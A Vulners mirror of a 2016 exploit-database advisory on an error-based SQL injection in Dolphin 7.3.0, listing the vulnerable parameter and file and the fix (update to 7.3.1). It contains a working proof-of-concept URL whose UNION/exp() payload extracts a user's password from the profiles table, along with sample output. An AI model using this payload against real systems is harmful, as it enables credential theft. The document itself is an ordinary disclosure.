Lucene search
K

Dolphin 7.3.0 - Error-Based SQL Injection

🗓️ 20 Sep 2016 00:00:00Reported by Kacper SzurekType 
zdt
 zdt
🔗 0day.today👁 31 Views

Dolphin 7.3.0 Error-Based SQL Injection in $_REQUEST['key'] unescape

Code
# Exploit Title: Dolphin 7.3.0 Error Based SQL Injection
# Date: 20-09-2016
# Software Link: https://www.boonex.com/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: webapps
  
1. Description
 
`$_REQUEST['key']` is not escaped inside `actions.inc.php`.
 
http://security.szurek.pl/dolphin-730-error-based-sql-injection.html
 
2. Proof of Concept
 
http://dolphin/flash/XML.php?module=chat&action=RayzSetMembershipSetting&id=1&_t=41920&key=' UNION select 1, exp(~(select*from(SELECT Password FROM profiles WHERE ID=1)x)); -- a
 
which is rendered as:
 
Database access error. Description: DOUBLE value is out of range in 'exp(~((select '%password_here%' from dual)))'<?xml version='1.0' encoding='UTF-8'?><ray><result value="Error saving setting." status="failed" /></ray>
 
3. Solution:
    
Update to version 7.3.1

#  0day.today [2018-02-19]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

20 Sep 2016 00:00Current
7.1High risk
Vulners AI Score7.1
31